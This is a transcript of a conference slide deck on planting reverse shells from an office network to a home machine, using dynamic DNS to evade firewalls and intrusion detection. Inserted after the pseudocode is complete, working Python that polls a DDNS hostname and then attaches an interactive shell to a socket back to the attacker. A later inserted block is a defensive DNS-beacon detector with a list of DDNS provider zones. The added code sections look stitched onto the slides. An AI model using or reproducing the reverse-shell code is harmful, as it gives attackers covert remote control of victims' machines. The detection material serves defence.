Spawning Reverse Shell, Anytime With Any IP!
Bhaumik Merchant, Indusface
Nov 22, 2014
24 slides

Transcript
Page 1: Spawn the shell

Spawning Reverse Shell, Anytime With Any IP!

Bhaumik Merchant

Page 2: Spawn the shell

Author And Speaker at….

Page 3: Spawn the shell

Objectives

• Reverse shell basics
• Advanced reverse shell method
• Dynamic DNS concepts
• Demo

Page 4: Spawn the shell

Let's Consider One Scenario To Understand The Reverse Shell Attack...

• Jack works in a corporate environment which is protected by IPSs, IDSs, firewalls etc.

• He plans an attack and decides to plant a reverse shell, because even these security mechanisms permit some amount of outbound traffic.

• He wants to spawn the shell from his office machine to his home machine after 6 p.m., i.e. once he reaches home.

Page 5: Spawn the shell

• Jack needs one live system at home, up and running with a handler on it, to receive the shell.

• Jack must know the IP address of his home machine before planting the shell on the office machine.

Page 6: Spawn the shell

Then what is the roadblock for Jack?

Page 7: Spawn the shell

• Jack's home machine should be running during office hours, with the handler listening on some port to receive the shell.

• Jack should know the IP address of his home machine before planting the shell on the office machine.

• But if he is using PPP or DHCP, the IP address will change on every connect and disconnect (ISPs allocate dynamic IPs to home users, e.g. home routers, internet dongles).

Page 8: Spawn the shell

What Is The Original Problem In Following The Formal Way To Spawn A Reverse Shell?

• Your place
• Your time
• Your IP

Page 9: Spawn the shell

#include <reverse-shell.h>

Page 10: Spawn the shell

One • Handler started on the attacker machine.

Two • Payload transfer phase from attacker to victim machine.

Three • Reverse shell or msf payload injected into the victim's machine.

Four • Attacker gets the victim's bash/cmd (Attack!!)

Page 11: Spawn the shell

Formal Way To Spawn The Reverse Shell!

Attacker: Handler Started On The Attacker's Machine → Inject Shell Into The Victim's Machine → Handler Gets The Reverse Shell → Game Over!

Page 12: Spawn the shell

Formal Flow Of Reverse-Shell - I (flowchart, attacker side)

Start Handler → Is The Handler Started? → Yes → Wait For Reverse-Shell → Get Reverse-Shell → Game Over!
                                         → No → (handler not up yet; no shell can be received)

Page 13: Spawn the shell

Dynamic Flow Of Reverse-Shell - II (flowchart, attacker side)

Start Handler → Is The Handler Started? → Yes → Wait For Reverse-Shell → Get Reverse-Shell → Game Over!

The handler may or may not have been started; either way you can still plant the reverse shell.

Page 14: Spawn the shell

Base Level Mechanism (Diagram)

EXE-I → EXE-II (synchronous execution: EXE-II runs only after EXE-I has finished)

EXE-I: existence check for the attacker, whether online or offline.

EXE-II: transfers the reverse shell to the attacker machine; any payload.

Page 15: Spawn the shell

So How It Works (I)?

A (attacker): machine listening for the reverse shell
V (victim): machine sends some packets to check the existence of the attacker
EXE-I in execution

Page 16: Spawn the shell

So How It Works (II)?

A (attacker): machine listening for the reverse shell
V (victim): machine sends some packets to check the existence of the attacker
Execution of EXE-I completed!

Page 17: Spawn the shell

So How It Works (III)?

A (attacker): machine listening for the reverse shell
V (victim): machine sends some packets to check the existence of the attacker
Execution of EXE-II started, and game over!

Page 18: Spawn the shell

#include <my-method.h>

Page 19: Spawn the shell

Dynamic Flow Of Reverse-Shell - II (flowchart, attacker side)

Start Handler → Is The Handler Started? → Yes → Wait For Reverse-Shell → Get Reverse-Shell → Game Over!

The handler may or may not have been started; either way you can still plant the reverse shell.

Page 20: Spawn the shell

How To Program It?

while (true) {
    /* EXE-I: poll until the attacker's dynamic DNS name answers, i.e. the attacker is online */
    if (icmp_reply_from("hh2012.dynamic-update.com")) {
        break;
    }
}

void reverse_shell_transfer() {
    /* EXE-II: runs only after the loop above has exited */
    transfer_reverse_shell();
}
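The loop above is the whole method in outline. What follows is an added worked example, not code from the deck: a complete Python version of EXE-I and EXE-II in which the resolver and the liveness probe are passed in as functions, so the polling logic can be exercised offline. The hostname is the deck's own placeholder; the handler port, the poll interval, and the use of a TCP connect to the handler port instead of an ICMP echo are assumptions of this example. The example also covers the case the pseudocode glosses over: a dynamic DNS name keeps resolving to yesterday's address until the updater rewrites it, and that address may by then belong to another subscriber.

```python
import socket
import subprocess
import time
from typing import Callable, Optional, Tuple

DDNS_NAME = "hh2012.dynamic-update.com"  # the deck's placeholder DDNS name
HANDLER_PORT = 4444                      # assumed handler port
POLL_SECONDS = 30                        # assumed polling interval

Resolver = Callable[[str], Optional[str]]
Probe = Callable[[str, int], bool]


def resolve_fresh(name: str) -> Optional[str]:
    """EXE-I, step 1: one fresh A lookup per poll. Nothing is cached on the
    client side: a DDNS record points at the old IP until the attacker's
    updater rewrites it, so every poll must ask DNS again."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def tcp_probe(ip: str, port: int, timeout: float = 3.0) -> bool:
    """EXE-I, step 2: existence check. The deck pings the host (ICMP echo);
    a TCP connect to the handler port is used here instead because it needs
    no raw-socket privilege and proves the handler itself is listening,
    not merely that some host answers at that address."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_handler(name: str, port: int, resolve: Resolver, probe: Probe,
                     poll_seconds: float = POLL_SECONDS, max_polls: int = 2880,
                     sleep: Callable[[float], None] = time.sleep) -> Tuple[Optional[str], int]:
    """The while(true) loop of EXE-I. Returns (ip, polls_used) as soon as the
    name resolves AND the address answers the probe, or (None, max_polls)
    if the handler never showed up (2880 polls of 30 s is one day).
    Resolving alone is not enough: the stale address may have been handed
    by the ISP to a stranger, and EXE-II must not give that stranger a shell."""
    for polls in range(1, max_polls + 1):
        ip = resolve(name)
        if ip is not None and probe(ip, port):
            return ip, polls
        sleep(poll_seconds)
    return None, max_polls


def reverse_shell(ip: str, port: int, shell: str = "/bin/sh") -> int:
    """EXE-II: connect back to the attacker and attach a shell to the socket
    (the cmd.exe version is the same idea with a different shell path)."""
    with socket.create_connection((ip, port)) as s:
        return subprocess.call([shell, "-i"], stdin=s, stdout=s, stderr=s)


def run(name: str = DDNS_NAME, port: int = HANDLER_PORT,
        resolve: Resolver = resolve_fresh, probe: Probe = tcp_probe,
        launch: Callable[[str, int], int] = reverse_shell, **kw) -> Optional[str]:
    """EXE-I then EXE-II, synchronously, as in the deck's diagram."""
    ip, _ = wait_for_handler(name, port, resolve, probe, **kw)
    if ip is not None:
        launch(ip, port)
    return ip


if __name__ == "__main__":
    # Offline simulation with constructed answers: the record still points at
    # the stale address for two polls, then the updater publishes the new one
    # and the handler answers the probe. No real network or shell is used.
    answers = iter(["203.0.113.5", "203.0.113.5", "198.51.100.7"])
    fake_resolve = lambda _name: next(answers, "198.51.100.7")
    fake_probe = lambda ip, port: ip == "198.51.100.7" and port == HANDLER_PORT
    found = run(resolve=fake_resolve, probe=fake_probe,
                launch=lambda ip, port: print(f"EXE-II would connect to {ip}:{port}") or 0,
                poll_seconds=0, sleep=lambda _s: None)
    print("handler found at", found)
```

Keeping the resolver and probe injectable is what makes the loop testable without a live handler; in a real run the defaults do a fresh lookup and a TCP connect each poll.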

Page 21: Spawn the shell

Captured DNS Request Made By Normal Browser

Page 22: Spawn the shell

Captured DNS Request Made By Our EXE In Live Attack
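The two captures compare a single lookup from EXE-I with a browser's lookup; as one packet they look alike. What a defender can look for instead is the cadence: the same client asking for the same name at a fixed interval for hours, which is what the polling loop produces. The following detection example is added here and is not from the deck. It parses constructed dnsmasq-style query log lines (the line format, the client addresses and the timestamps are all assumptions) and flags (client, name) pairs whose inter-query gaps are regular; the list of dynamic DNS provider zones is likewise an assumption, used only to rank findings.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed sample in a dnsmasq-like format (assumed):
# "<date> <time> query[A] <name> from <client>".
# 10.0.0.23 polls the deck's DDNS name every 30 s; 10.0.0.41 browses normally.
SAMPLE_LOG = """\
2014-11-22 18:00:01 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:00:02 query[A] www.example.com from 10.0.0.41
2014-11-22 18:00:09 query[A] cdn.example.net from 10.0.0.41
2014-11-22 18:00:31 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:01:01 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:01:31 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:01:50 query[A] www.example.com from 10.0.0.41
2014-11-22 18:02:01 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:02:20 query[A] www.example.com from 10.0.0.41
2014-11-22 18:02:31 query[A] hh2012.dynamic-update.com from 10.0.0.23
2014-11-22 18:02:40 query[A] www.example.com from 10.0.0.41
2014-11-22 18:03:00 query[A] www.example.com from 10.0.0.41
"""

LINE_RE = re.compile(r"^(\S+ \S+) query\[A\] (\S+) from (\S+)$")

# Assumed list of dynamic DNS provider zones; the deck's placeholder domain
# is included for illustration only.
DDNS_SUFFIXES = ("dynamic-update.com", "no-ip.com", "dyndns.org", "duckdns.org")


def parse_queries(log_text: str) -> Dict[Tuple[str, str], List[datetime]]:
    """Group query timestamps by (client, name); malformed lines are skipped."""
    groups: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        groups[(m.group(3), m.group(2).lower())].append(ts)
    return groups


def is_ddns_name(name: str) -> bool:
    """True when the name sits under one of the assumed DDNS provider zones."""
    return any(name == s or name.endswith("." + s) for s in DDNS_SUFFIXES)


def find_beacons(log_text: str, min_queries: int = 5, max_cv: float = 0.2) -> List[dict]:
    """Flag (client, name) pairs queried at a regular cadence.
    Regularity is the coefficient of variation (stdev / mean) of the gaps
    between consecutive queries: a browser revisiting a site gives bursty,
    irregular gaps, while a polling loop gives gaps clustered around its
    sleep interval. Findings under a DDNS zone are ranked first."""
    findings = []
    for (client, name), stamps in parse_queries(log_text).items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({"client": client, "name": name, "queries": len(stamps),
                             "interval_s": round(avg, 1), "cv": round(cv, 3),
                             "ddns_zone": is_ddns_name(name)})
    return sorted(findings, key=lambda f: (f["ddns_zone"], f["queries"]), reverse=True)


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['name']}: {f['queries']} queries every "
              f"~{f['interval_s']} s (cv={f['cv']}, ddns_zone={f['ddns_zone']})")
```

In the sample, 10.0.0.41 also reaches five lookups of www.example.com, but its gaps (108, 30, 20, 20 seconds) are far too irregular to pass the cadence test, so only the 30-second poll from 10.0.0.23 is reported. A low record TTL on the queried name is a second useful signal, since the beacon relies on the record changing; the sample log does not carry TTLs, so this example does not score it.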

Page 23: Spawn the shell

Let’s Get Our Hands Dirty !

#include <demo.h>

Page 24: Spawn the shell

[email protected]@indusface.com

Thank You